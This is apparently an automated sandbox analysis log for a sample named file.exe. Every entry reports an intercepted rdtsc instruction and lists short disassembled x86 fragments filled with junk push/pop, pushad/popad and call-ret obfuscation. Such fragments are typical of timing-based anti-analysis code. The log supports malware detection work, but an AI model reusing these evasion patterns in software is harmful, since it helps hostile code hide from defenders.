                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9EBF5 second address: F9EC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007F389C8383A4h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F389C838396h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F1DA second address: F9F235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389CFCC94Fh 0x00000009 popad 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F389CFCC948h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov esi, 0DFC4B68h 0x0000002b xor edi, 376E0B04h 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F389CFCC957h 0x00000039 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F235 second address: F9F23A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F38C second address: F9F394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F394 second address: F9F3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 js 00007F389C838398h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F5F5 second address: F9F5FF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F735 second address: F9F750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 jmp 00007F389C83839Fh 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F750 second address: F9F774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389CFCC957h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F774 second address: F9F786 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F389C838396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F389C838396h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0614 second address: FA061A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA061A second address: FA0621 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1783 second address: FA1789 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1789 second address: FA178E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA223C second address: FA2264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b pushad 0x0000000c jno 00007F389CFCC946h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA2264 second address: FA22A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F389C838398h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D19E1h], eax 0x00000027 push 00000000h 0x00000029 sub edi, 3912168Ah 0x0000002f push 00000000h 0x00000031 mov edi, ecx 0x00000033 push eax 0x00000034 push esi 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA22A4 second address: FA22AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA2CA3 second address: FA2CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA2CA7 second address: FA2CB5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA2CB5 second address: FA2CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA37AA second address: FA37AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA37AF second address: FA37C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F389C83839Dh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA37C7 second address: FA37CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA37CB second address: FA37D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA37D5 second address: FA37D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA37D9 second address: FA383C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F389C838398h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+1248BC0Fh], ecx 0x0000002d push 00000000h 0x0000002f and si, CC8Dh 0x00000034 xchg eax, ebx 0x00000035 pushad 0x00000036 jc 00007F389C838398h 0x0000003c pushad 0x0000003d popad 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F389C8383A3h 0x00000045 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4383 second address: FA43A0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F389CFCC94Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F389CFCC94Ah 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5E07 second address: FA5E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5E0F second address: FA5E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5E15 second address: FA5E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5E1A second address: FA5E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jg 00007F389CFCC946h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F645A2 second address: F645C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F389C8383A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6480 second address: FA6484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6484 second address: FA64E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F389C838398h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2F1Dh], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F389C838398h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 xchg eax, ebx 0x00000049 push edi 0x0000004a push eax 0x0000004b push edx 0x0000004c push edi 0x0000004d pop edi 0x0000004e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA35C4 second address: FA35D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F389CFCC946h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8DB9 second address: FA8DBE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8DBE second address: FA8DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8DCC second address: FA8DE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8DE5 second address: FA8DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9DE9 second address: FA9DFE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F389C838396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jc 00007F389C8383B2h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9ED9 second address: FA9EF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F389CFCC959h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE0C8 second address: FAE0D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F389C838396h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE0D5 second address: FAE0D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE0D9 second address: FAE147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bl, A7h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F389C838398h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 call 00007F389C8383A2h 0x0000002d jmp 00007F389C8383A9h 0x00000032 pop ebx 0x00000033 add ebx, 398C1494h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c mov edi, dword ptr [ebp+122D3921h] 0x00000042 pop edi 0x00000043 xchg eax, esi 0x00000044 push ebx 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE147 second address: FAE158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F389CFCC946h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE158 second address: FAE162 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F389C838396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB075E second address: FB0762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0762 second address: FB0783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2D67 second address: FB2D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3DC6 second address: FB3DE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F389C83839Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3DE9 second address: FB3E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 or bl, FFFFFFBCh 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F389CFCC948h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 jbe 00007F389CFCC94Bh 0x0000002d mov ebx, 3CF218BCh 0x00000032 push 00000000h 0x00000034 jne 00007F389CFCC94Ch 0x0000003a mov dword ptr [ebp+122D2A58h], ecx 0x00000040 xchg eax, esi 0x00000041 push edi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F389CFCC94Ch 0x00000049 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3E46 second address: FB3E6B instructions: 0x00000000 rdtsc 0x00000002 js 00007F389C838396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F389C8383A7h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3E6B second address: FB3E75 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F389CFCC94Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB4E7C second address: FB4E9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jnc 00007F389C838398h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DED4 second address: F9DEDE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F389C838396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DEDE second address: F9DF2A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F389CFCC94Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F389CFCC948h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2980h], edi 0x0000002d push 0000001Eh 0x0000002f mov dword ptr [ebp+122D5963h], ecx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DF2A second address: F9DF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DF2E second address: F9DF38 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D9D8 second address: F9D9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9E2A8 second address: F9E2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9E2AC second address: F9E2EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F389C838398h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov dx, 98E6h 0x00000028 lea eax, dword ptr [ebp+12491CECh] 0x0000002e mov edx, dword ptr [ebp+122D3741h] 0x00000034 push eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED4F3 second address: FED4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED67E second address: FED6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F389C8383A7h 0x0000000c jnc 00007F389C838396h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED6A4 second address: FED6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED6A9 second address: FED6DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F389C838396h 0x00000009 pop eax 0x0000000a jmp 00007F389C8383A9h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007F389C8383AEh 0x00000017 push edi 0x00000018 pushad 0x00000019 popad 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED6DC second address: FED6E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDB4E second address: FEDB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDCC7 second address: FEDCCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDE1A second address: FEDE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDE20 second address: FEDE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F389CFCC94Ch 0x0000000b jmp 00007F389CFCC958h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F389CFCC959h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F389CFCC951h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDE68 second address: FEDE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F389C838396h 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDE73 second address: FEDE78 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDE78 second address: FEDE96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007F389C8383A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2BC1 second address: FF2BC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF5176 second address: FF517A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF517A second address: FF51A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC955h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jc 00007F389CFCC946h 0x00000010 jg 00007F389CFCC946h 0x00000016 pop edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF51A1 second address: FF51B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F389C83839Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA7BC second address: FFA7D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jnp 00007F389CFCC948h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFAC2E second address: FFAC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFAD9E second address: FFADA9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFADA9 second address: FFADCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C8383A3h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFADCD second address: FFADEF instructions: 0x00000000 rdtsc 0x00000002 js 00007F389CFCC946h 0x00000008 jg 00007F389CFCC946h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 jmp 00007F389CFCC94Bh 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c rdtsc
